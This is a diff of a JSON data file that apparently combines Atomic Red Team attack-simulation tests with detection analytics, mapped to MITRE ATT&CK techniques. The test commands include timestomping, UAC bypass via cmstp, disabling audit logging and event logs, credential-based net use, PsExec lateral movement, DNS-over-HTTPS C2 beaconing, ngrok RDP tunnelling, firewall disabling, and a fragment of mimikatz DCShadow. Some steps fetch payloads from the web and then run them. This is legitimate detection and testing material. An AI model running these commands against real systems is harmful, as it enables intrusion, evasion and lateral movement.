\\..\\ExternalPayloads\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", - "Get-ChildItem \\..\\ExternalPayloads\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem \"\\..\\ExternalPayloads\\T1551.006_timestomp.txt\" | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem \"\\..\\ExternalPayloads\\T1551.006_timestomp.txt\" | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem \"\\..\\ExternalPayloads\\T1551.006_timestomp.txt\" | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", "import-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest \"$env:appdata\\Microsoft\\kxwn.lock\"\n" ], "commands": [], @@ -278583,12 +281324,12 @@ "dependencies": [ { "description": "A file must exist at the path (#{file_path}) to change the creation time on\n", - "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + "prereq_command": "if (Test-Path \"#{file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path \"#{file_path}\" -Force | Out-Null\nSet-Content \"#{file_path}\" -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" } ], "executor": { - "command": "Get-ChildItem #{file_path} | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "command": "Get-ChildItem \"#{file_path}\" | % { $_.CreationTime = \"#{target_date_time}\" }\n", "name": "powershell" } }, @@ -278615,12 +281356,12 @@ "dependencies": [ { "description": "A file must exist at the path (#{file_path}) to change the modified time on\n", - "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + "prereq_command": "if (Test-Path \"#{file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path \"#{file_path}\" -Force | Out-Null\nSet-Content \"#{file_path}\" -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" } ], "executor": { - "command": "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "command": "Get-ChildItem \"#{file_path}\" | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", "name": "powershell" } }, @@ -278646,13 +281387,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "A file must exist at the path (#{file_path}) to change the last access time on\n", - "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + "description": "A file must exist at the path (\"#{file_path}\") to change the last access time on\n", + "prereq_command": "if (Test-Path \"#{file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path \"#{file_path}\" -Force | Out-Null\nSet-Content \"#{file_path}\" -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" } ], "executor": { - "command": "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "command": "Get-ChildItem \"#{file_path}\" | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", "name": "powershell" } }, @@ -280022,7 +282763,7 @@ } ], "command_list": [ - "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe \\T1010\\src\\T1010.cs\n%TEMP%\\T1010.exe\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:%TEMP%\\T1010.exe \"\\T1010\\src\\T1010.cs\"\n%TEMP%\\T1010.exe\n", "$x = Get-Process | Where-Object {$_.MainWindowTitle -ne \"\"} | Select-Object MainWindowTitle;\n$a = New-Object -com \"Shell.Application\"; $b = $a.windows() | select-object LocationName;\nwrite-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)" ], "commands": [], @@ -280058,12 +282799,12 @@ "dependencies": [ { "description": "T1010.cs must exist on disk at specified location (#{input_source_code})\n", - "prereq_command": "if (Test-Path #{input_source_code}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile \"#{input_source_code}\"\n" + "prereq_command": "if (Test-Path \"#{input_source_code}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{input_source_code}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile \"#{input_source_code}\"\n" } ], "executor": { - "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} #{input_source_code}\n#{output_file_name}\n", + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -out:#{output_file_name} \"#{input_source_code}\"\n#{output_file_name}\n", "cleanup_command": "del /f /q /s #{output_file_name} >nul 2>&1\n", "name": "command_prompt" } @@ -281283,7 +284024,8 @@ "analytic_story": [ "Data Destruction", "WhisperGate", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -281647,8 +284389,8 @@ } ], "command_list": [ - "cmstp.exe /s \\T1218.003\\src\\T1218.003.inf\n", - "cmstp.exe /s \\T1218.003\\src\\T1218.003_uacbypass.inf /au\n" + "cmstp.exe /s \"\\T1218.003\\src\\T1218.003.inf\"\n", + "cmstp.exe /s \"\\T1218.003\\src\\T1218.003_uacbypass.inf\" /au\n" ], "commands": [], "queries": [], @@ -281678,12 +284420,12 @@ "dependencies": [ { "description": "INF file must exist on disk at specified location (#{inf_file_path})\n", - "prereq_command": "if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003.inf\" -OutFile \"#{inf_file_path}\"\n" + "prereq_command": "if (Test-Path \"#{inf_file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_file_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003.inf\" -OutFile \"#{inf_file_path}\"\n" } ], "executor": { - "command": "cmstp.exe /s #{inf_file_path}\n", + "command": "cmstp.exe /s \"#{inf_file_path}\"\n", "name": "command_prompt" } }, @@ -281705,12 +284447,12 @@ "dependencies": [ { "description": "INF file must exist on disk at specified location (#{inf_file_uac})\n", - "prereq_command": "if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf\" -OutFile \"#{inf_file_uac}\"\n" + "prereq_command": "if (Test-Path \"#{inf_file_uac}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_file_uac}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf\" -OutFile \"#{inf_file_uac}\"\n" } ], "executor": { - "command": "cmstp.exe /s #{inf_file_uac} /au\n", + "command": "cmstp.exe /s \"#{inf_file_uac}\" /au\n", "name": "command_prompt" } } @@ -283267,7 +286009,7 @@ { "name": "CMLUA Or CMSTPLUA UAC Bypass", "description": "This analytic detects a potential process using COM Object like CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges to its running process.", - "search": "`sysmon` EventCode=7 ImageLoaded IN (\"*\\\\CMLUA.dll\", \"*\\\\CMSTPLUA.dll\", \"*\\\\CMLUAUTIL.dll\") NOT(process_name IN(\"CMSTP.exe\", \"CMMGR32.exe\")) NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter`", + "search": "`sysmon` EventCode=7 ImageLoaded IN (\"*\\\\CMLUA.dll\", \"*\\\\CMSTPLUA.dll\", \"*\\\\CMLUAUTIL.dll\") NOT(process_name IN(\"CMSTP.exe\", \"CMMGR32.exe\")) NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter`", "tags": { "name": "CMLUA Or CMSTPLUA UAC Bypass", "analytic_story": [ @@ -283282,7 +286024,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $Computer$ by user $user$.", + "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$", "mitre_attack_id": [ "T1218", "T1218.003" @@ -283292,25 +286034,11 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "ImageLoaded", - "type": "Other", - "role": [ - "Other" - ] } ], "risk_score": 80, @@ -283344,7 +286072,7 @@ { "name": "UAC Bypass With Colorui COM Object", "description": "This search is to detect a possible uac bypass using the colorui.dll COM Object. this technique was seen in so many malware and ransomware like lockbit where it make use of the colorui.dll COM CLSID to bypass UAC.", - "search": "`sysmon` EventCode=7 ImageLoaded=\"*\\\\colorui.dll\" process_name != \"colorcpl.exe\" NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name Computer EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter`", + "search": "`sysmon` EventCode=7 ImageLoaded=\"*\\\\colorui.dll\" process_name != \"colorcpl.exe\" NOT(Image IN(\"*\\\\windows\\\\*\", \"*\\\\program files*\")) | stats count min(_time) as firstTime max(_time) as lastTime by dest parent_process_name process_name ImageLoaded signature_id signature Signed user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `uac_bypass_with_colorui_com_object_filter`", "tags": { "name": "UAC Bypass With Colorui COM Object", "analytic_story": [ @@ -283358,7 +286086,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $Computer$ by user $user$.", + "message": "The following module $ImageLoaded$ was loaded by a non-standard application $parent_process_name$ on endpoint $dest$ by user $user_id$.", "mitre_attack_id": [ "T1218", "T1218.003" @@ -283368,14 +286096,7 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -284591,7 +287312,7 @@ "auditpol /set /category:\"Account Logon\" /success:disable /failure:disable\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\nauditpol /set /category:\"Detailed Tracking\" /success:disable\n", "auditpol /clear /y\nauditpol /remove /allusers\n", "wevtutil sl \"Microsoft-Windows-IKE/Operational\" /e:false\n", - "\\T1562.002\\bin\\Phant0m.exe\n" + "\"\\T1562.002\\bin\\Phant0m.exe\"\n" ], "commands": [], "queries": [], @@ -284723,12 +287444,12 @@ "dependencies": [ { "description": "Phant0m.exe must exist on disk at specified location (#{file_name})\n", - "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + "prereq_command": "if (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\" -OutFile \"#{file_name}\" -UseBasicParsing\n" } ], "executor": { - "command": "PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\n", + "command": "\"#{file_name}\"\n", "cleanup_command": "echo \"Sorry you have to reboot\"\n", "name": "command_prompt" } @@ -286917,7 +289638,7 @@ "command_list": [ "cmd.exe /c \"net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator\"\n", "New-PSDrive -name g -psprovider filesystem -root \\\\Target\\C$\n", - "\\..\\ExternalPayloads\\PsExec.exe \\\\localhost -accepteula -c C:\\Windows\\System32\\cmd.exe\n", + "\"\\..\\ExternalPayloads\\PsExec.exe\" \\\\localhost -accepteula -c C:\\Windows\\System32\\cmd.exe\n", "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\output.txt 2>&1\n", "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n", "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n", @@ -287025,11 +289746,11 @@ { "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})\n", "prereq_command": "if (Test-Path \"#{psexec_exe}\") { exit 0} else { exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"#{psexec_exe}\" -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_exe}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"#{psexec_exe}\" -Force\n" } ], "executor": { - "command": "#{psexec_exe} #{remote_host} -accepteula -c #{command_path}\n", + "command": "\"#{psexec_exe}\" #{remote_host} -accepteula -c #{command_path}\n", "name": "command_prompt", "elevation_required": true } @@ -290142,8 +292863,8 @@ ], "command_list": [ "for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \"https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=TXT\" -UseBasicParsing).Content }\n", - "Set-Location \n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30\n", - "Set-Location \n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT\n", + "Set-Location \"\"\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30\n", + "Set-Location \"\"\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT\n", "C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken N/A | Out-Null\nStart-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe tcp 3389 } | Out-Null\nStart-Sleep -s 5 \nStop-Job -Name Job1 | Out-Null\n" ], "commands": [], @@ -290240,7 +292961,7 @@ } }, "executor": { - "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", + "command": "Set-Location \"PathToAtomicsFolder\"\n.\\T1572\\src\\T1572-doh-beacon.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}\n", "name": "powershell" } }, @@ -290274,7 +292995,7 @@ } }, "executor": { - "command": "Set-Location PathToAtomicsFolder\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", + "command": "Set-Location \"PathToAtomicsFolder\"\n.\\T1572\\src\\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}\n", "name": "powershell" } }, @@ -292775,7 +295496,7 @@ } ], "command_list": [ - "control.exe \\T1218.002\\bin\\calc.cpl\n" + "control.exe \"\\T1218.002\\bin\\calc.cpl\"\n" ], "commands": [], "queries": [], @@ -292805,12 +295526,12 @@ "dependencies": [ { "description": "Cpl file must exist on disk at specified location (#{cpl_file_path})\n", - "prereq_command": "if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl\" -OutFile \"#{cpl_file_path}\"\n" + "prereq_command": "if (Test-Path \"#{cpl_file_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{cpl_file_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl\" -OutFile \"#{cpl_file_path}\"\n" } ], "executor": { - "command": "control.exe #{cpl_file_path}\n", + "command": "control.exe \"#{cpl_file_path}\"\n", "name": "command_prompt" } } @@ -296053,7 +298774,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "", + "message": "Unknown process $process_name$ using the kerberos protocol detected on host $dest$", "mitre_attack_id": [ "T1550" ], @@ -296062,24 +298783,111 @@ ], "observable": [ { - "name": "src_ip", - "type": "IP Address", + "name": "dest", + "type": "Hostname", "role": [ - "Attacker" + "Victim" + ] + } + ], + "risk_score": 36, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1550", + "mitre_attack_technique": "Use Alternate Authentication Material", + "mitre_attack_tactics": [ + "Defense Evasion", + "Lateral Movement" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Windows Steal Authentication Certificates - ESC1 Authentication", + "description": "The following analytic identifies when a suspicious certificate is granted using Active Directory Certificate Services (AD CS) with a Subject Alternative Name (SAN) and then immediately used for authentication. This action alone may not be malicious, however improperly configured certificate templates can be abused to permit privilege escalation and environment compromise due to over permissive settings (AD CS ESC1).", + "search": "`wineventlog_security` EventCode IN (4887) Attributes=\"*SAN:*upn*\" Attributes=\"*CertificateTemplate:*\" | stats count min(_time) as firstTime max(_time) as lastTime values(name) as name values(status) as status values(Subject) as ssl_subject values(SubjectKeyIdentifier) as ssl_hash by Computer, EventCode, Requester, Attributes, RequestId | rex field=Attributes \"(?i)CertificateTemplate:(?[^\\r\\n]+)\" | rex field=Attributes \"(?i)ccm:(?[^\\r\\n]+)\" | rex max_match=10 field=Attributes \"(?i)(upn=(?[^\\r\\n&]+))\" | rex max_match=10 field=Attributes \"(?i)(dns=(?[^\\r\\n&]+))\" | rex field=Requester \"(.+\\\\\\\\)?(?[^\\r\\n]+)\" | rename Attributes as object_attrs, EventCode as signature_id, name as signature, RequestId as ssl_serial, Requester as ssl_subject_common_name | eval user = lower(coalesce(req_user_1,req_user_2)) | join user [ | search `wineventlog_security` EventCode=4768 CertThumbprint=* | rename TargetUserName as user, Computer as auth_dest, IpAddress as auth_src | fields auth_src,auth_dest,user ] | eval src = upper(coalesce(auth_src,req_src)), dest = upper(coalesce(auth_dest,req_dest_1,req_dest_2)), risk_score = 90 | eval flavor_text = case(signature_id==\"4887\", \"User account [\".'user'.\"] authenticated after a suspicious certificate was issued for it by [\".'src_user'.\"] using certificate request ID: \".'ssl_serial') | fields - req_* auth_* | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_steal_authentication_certificates___esc1_authentication_filter`", + "tags": { + "name": "Windows Steal Authentication Certificates - ESC1 Authentication", + "analytic_story": [ + "Windows Certificate Services" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Possible AD CS ESC1 authentication on $dest$", + "mitre_attack_id": [ + "T1649", + "T1550" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "src", + "type": "Hostname", + "role": [ + "Victim" ] }, { - "name": "dest_ip", - "type": "IP Address", + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "src_user", + "type": "User Name", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User Name", "role": [ "Victim" ] + }, + { + "name": "ssl_hash", + "type": "Other", + "role": [ + "Attacker" + ] + }, + { + "name": "ssl_serial", + "type": "Other", + "role": [ + "Attacker" + ] } ], - "risk_score": 36, + "risk_score": 90, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, { "mitre_attack_id": "T1550", "mitre_attack_technique": "Use Alternate Authentication Material", @@ -301304,7 +304112,7 @@ "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\nnetsh advfirewall firewall set rule group=\"file and printer sharing\" new enable=Yes\n", "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450 \n", "netsh advfirewall firewall add rule name=\"Open Port to Any\" dir=in protocol=tcp localport=3389 action=allow profile=any", - "Copy-Item \\T1562.004\\bin\\AtomicTest.exe -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "Copy-Item \"\\T1562.004\\bin\\AtomicTest.exe\" -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", "ufw disable\n", "systemctl stop ufw\n", "ufw logging off\n", @@ -301419,7 +304227,7 @@ } }, "executor": { - "command": "Copy-Item #{exe_file_path} -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "command": "Copy-Item \"#{exe_file_path}\" -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", "cleanup_command": "netsh advfirewall firewall delete rule name=\"Atomic Test\" | Out-Null\nRemove-Item C:\\Users\\$env:UserName\\AtomicTest.exe -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -302910,16 +305718,16 @@ "observable": [ { "name": "dest", - "type": "Hostname", + "type": "Endpoint", "role": [ "Victim" ] }, { - "name": "SourceImage", - "type": "Process", + "name": "user", + "type": "User", "role": [ - "Attacker" + "Victim" ] } ], @@ -304502,7 +307310,7 @@ { "name": "Azure AD Concurrent Sessions From Different Ips", "description": "The following analytic identifies an Azure AD account with concurrent sessions coming from more than one unique Ip address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victims browser and is using them from a different location to access corporate online resources. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.", - "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=NonInteractiveUserSignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_concurrent_sessions_from_different_ips_filter`", + "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=NonInteractiveUserSignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) as ipAddress values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_concurrent_sessions_from_different_ips_filter`", "tags": { "name": "Azure AD Concurrent Sessions From Different Ips", "analytic_story": [ @@ -306877,7 +309685,7 @@ { "name": "Allow Inbound Traffic By Firewall Rule Registry", "description": "This analytic detects a potential suspicious modification of firewall rule registry allowing inbound traffic in specific port with public profile. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\FirewallRules\\\\*\" Registry.registry_value_data = \"*|Action=Allow|*\" Registry.registry_value_data = \"*|Dir=In|*\" Registry.registry_value_data = \"*|LPort=*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\FirewallRules\\\\*\" Registry.registry_value_data = \"*|Action=Allow|*\" Registry.registry_value_data = \"*|Dir=In|*\" Registry.registry_value_data = \"*|LPort=*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter`", "tags": { "name": "Allow Inbound Traffic By Firewall Rule Registry", "analytic_story": [ @@ -306991,7 +309799,7 @@ ], "observable": [ { - "name": "user", + "name": "User", "type": "User", "role": [ "Victim" @@ -307162,7 +309970,7 @@ { "name": "Enable RDP In Other Port Number", "description": "This search is to detect a modification to registry to enable rdp to a machine with different port number. This technique was seen in some atttacker tries to do lateral movement and remote access to a compromised machine to gain control of it.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp*\" Registry.registry_value_name = \"PortNumber\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_rdp_in_other_port_number_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp*\" Registry.registry_value_name = \"PortNumber\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `enable_rdp_in_other_port_number_filter`", "tags": { "name": "Enable RDP In Other Port Number", "analytic_story": [ @@ -311084,7 +313892,7 @@ } ], "command_list": [ - "# starting fake DC server, as SYSTEM (required)\n$dc_output_file = \"\\..\\ExternalPayloads\\art-T1207-mimikatz-DC.log\"\nRemove-Item $dc_output_file -ErrorAction Ignore\n$mimikatzParam =\"`\"log $dc_output_file`\" 